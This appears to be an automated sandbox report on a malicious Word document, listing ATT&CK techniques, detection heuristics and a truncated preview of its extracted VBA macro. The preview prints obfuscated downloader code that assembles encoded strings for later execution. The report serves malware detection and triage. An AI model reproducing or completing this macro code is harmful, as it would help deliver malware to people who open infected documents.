MALICIOUS
244
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The AutoOpen macro and Shell() calls indicate an attempt to execute arbitrary code. The obfuscated script suggests it is designed to download and execute a secondary payload, aligning with common malware delivery techniques.
Heuristics 8
-
ClamAV: Doc.Macro.Obfuscation-6355576-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Macro.Obfuscation-6355576-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11006 bytes |
SHA-256: ae5a91c76882900bcba9afc5bf3b41890dd7d168ec678d7cd97c2e0432a53d48 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 31 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "Module1" Sub vOBUpAXks() SHvLLnQjK = "7CGRA503YJ90S1MBVN9U6AyACwAIAA1ADgALAA0ADcAIAAsADQANwAgACwAMQAwADkAIAAsACAAMQAyADEALAAxADAAOQAgACwAIAA5ADcAIAAsADkAOQAsADEAMAA0ACAALAAgADEAMAA1ACwAIAAxADEAMAAsADEAMAAxACAALAAxADEANAAgACwAIAAxADIAMQAsACAANAA2ACAALAAgADkAOQAgACwAOQA3ACAATBLQE910R9TYCP" zWwHiscz = Mid(SHvLLnQjK, 22, 214) TCzSpYvTH = zWwHiscz pqLORtzn = "2N0D2DV8HGZU28SMI3ADTMCEAMAA4ACwAIAAxADAANQAgACwAMQAwADEALAAxADEAMAAsACAAMQAxADYALAAzADIALAAgADYAMQAsACAAMwAyACAALAAxADEAMAAgACwAMQAwADEALAAgADEAMQA5ACwANAA1ACwAIAAxADEAMQAgACwAIAA5ADgAIAAsADEAMAA2ACAALAAxADAAMQAsADkAOQAsADEAMQA2ACwAMwAyACwAOAAzACwAIAAxADIAMQAgACwAMQAxADUALAAxADEANgAgACwAIAAxADAAMQAMIXDQN7GPBMUUKC" BaWiFTV = Mid(pqLORtzn, 24, 277) RDbNAzcStRQ = BaWiFTV bjGYMDsY = "5WXDMQF88M7KHT2NZV54147ADEANQAsADEAMQA2ACwAIAAzADIALAAgADMANgAgACwAIAA5ADUAIAAsACAANAA2ACAALAA2ADkALAAgADEAMgAwACwAOQA5ACAALAAxADAAMQAXR7G9K" iWqBFzjbtP = Mid(bjGYMDsY, 24, 111) INzZdIzM = iWqBFzjbtP GFbCGXvBJ = "BO7GMP7T4SS3CHW8CEAIAAsADkAOQAsACAAMQAxADYAIAAsACAAMwAyACwAMQAxADQALAAgADkANwAgACwAMQAxADAAIAAsACAAMQAwADAAIQ9VKJ272E8JU1XEVDT4R" FdhsRLwwmb = Mid(GFbCGXvBJ, 18, 90) HtEnEV = FdhsRLwwmb JDINIw = "K9670J7X5P6OQ08DJS1XESR3L5sACAAMQAxADkALAAgADEAMQAwACwAMQAwADgAIAAsADEAMQAxACwAIAA5ADcAIAAsACAAMQAwADAALAA3ADAAIAAsACAAMQAwADUAIAAsADEAMAA4ACAALI2Y0HS" rZzkmGvfz = Mid(JDINIw, 27, 118) MhhijS = rZzkmGvfz TMHCUVdZl = "B7QHJBAJKV85GUQEYKE2AwADMALAA5ADkALAAgADEAMQAzACwAMQAwADEALAA2ADUAIAAsACAANAA3ACwAIAA0ADQAIAAsACAAMQAwADQALAAxADEANgAgACwAIAAxADEANgAsADEAMQDE" PVpRdKRYpt = Mid(TMHCUVdZl, 21, 120) GPmuIZNAiwr = PVpRdKRYpt WASjmMzV = "WT9KY3FRACAAMQAxADQAIAAsACAAMQAwADEAIAAsADkANwAgACwAIAA5ADkALAAxADAANAAsACAANAAwACAALAAgADMANgAsACAAMQAxADcAIAAsACAAMQAxADQAIAAsACAAMQAwADgAIAAsACAAMwAyACAALAAxADAANQAgACwAMQAxADAAIK6LR9YG" LvPZHq = Mid(WASjmMzV, 9, 173) LLWcDmhM = LvPZHq YfjUDfGolX = "POSVAxADAAIAAsADEAMQA2ACAALAA1ADkAIAAsADMANgAgACwAIAAxADEANAAgACwAOQA3ACAALAAxADEAMAAsACAAMQAwADAALAAxADEAMQAsADEAMAA5ACwAMwAyACAALAAgADYAMQAsACAAMwAyACAALAAgADEAMQAwACAALAAgADEAMAAxACAALAAgADEAMQA5ACwAIAA0ADUALAAxADEAMQAsACAAOQA4ACAALAAxADAANgAsACAAMQAwAD3O4XJ286AK5" KVkSFZW = Mid(YfjUDfGolX, 5, 252) ivJnMozzuz = KVkSFZW pBDjmD = "5P3D4WP36NZELAAgADMAOQAsACAANAA2ACwAOAAzACAALAAxADEAMgAgACwAIAAxADAAOAAgACwAIAAxADAANQAsADEAMQA2ACwAIAA0ADAAIAAsADMAOQAgACwANAA0ACwAIAAzADkAIAAsADQAMQAsADUAOQAgACwAIAAzADYAIAAsIVAW1APBV6Y1W7D12O" PZkLCTK = Mid(pBDjmD, 13, 164) mwZqbQjiAwz = PZkLCTK vJSCi = "N2DGUGEB8I7BLJ20SUIRQ37AwACwANAA2ACwANwA3ACwAMQAwADEALAAxADEANQAgACwAIAAxADEANQAsACAAOQA3S" cWENaGsTNl = Mid(vJSCi, 24, 65) QwmZCmQqKu = cWENaGsTNl nPasuQF = "516XA38EKUIBLPSJWN8X4HCMgAgACwAMQAxADYAIAAsADQANwAsACAANAA0ACwAMQAwADQAIAAsACAAMQAxADYAIAAsADEAMQA2ACwAMQAxADIALAA1ADgALAAgADQANwAsACAANAA3ACAALAA5ADkAIAAsADEAMAA0ACAALAAxADEAMQAsADEAMQA0ACwAIAAxADEANwAgACwAIAAxAD5GCACUH0KAAI93" utFZoP = Mid(nPasuQF, 24, 190) dApktJ = utFZoP DpJncIMDK = "PRID30gACwAIAAxADEAMgAsACAAMQAxADYAIAAsADEAMAA1ACAALAAgADEAMQAxACAALAAgADEAMQYVTO1HS7K3VNU58AS21" MoGRF = Mid(DpJncIMDK, 7, 71) zEDIklLVv = MoGRF UrLnBTs = "7SJ5YAVOLR5BV0C82FHQNB443TCAAsADMV9ZJTH" FjbMcNQE = Mid(UrLnBTs, 28, 6) MuqrNwfp = FjbMcNQE DiXzISmo = "JEDO9I2NOTDTKJQA1ACAALAAgADMAMgAsACAAMwA2ACwAIAAxADEAMgAgACwAIAA5ADcALAAgADEAMQA2ACwAMQAwADQALAA1ADkAIAAsADkAOAAsADEAMQA0ACwAIAAxADAAMQAgACwAOQA3ACAPTKT0HO9N5S782GEWJRV" ZFNjSoPnd = Mid(DiXzISmo, 15, 134) jjJSkhGkThq = ZFNjSoPnd fWjNHSfrU = "GLDLNMWILAAgADQANwAgACwAIAA3ADIALAAgADYAOAAsADkAOQAgACwANwAwACAALAAgADEAMgQ9" OwuPmP = Mid(fWjNHSfrU, 9, 66) hSGrX = OwuPmP BCwjmUja = "8Q1872WUAgADEAMAA1ACwAMQAxADIALAAxADEANgAgACwAIAAzADIALAA2ADEALAAgADMAMgAgACwAIAAxADEAMAAgACwAIAAxADAAMQAsADEAMQA5ACAALAA0ADUALAAgADEAMQAxACAALAAgADkAOAAgACwAIAAxADAANgAgACwAIAAxADAAMQAgACwAVUD1RF" WfCrjnnI = Mid(BCwjmUja, 9 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.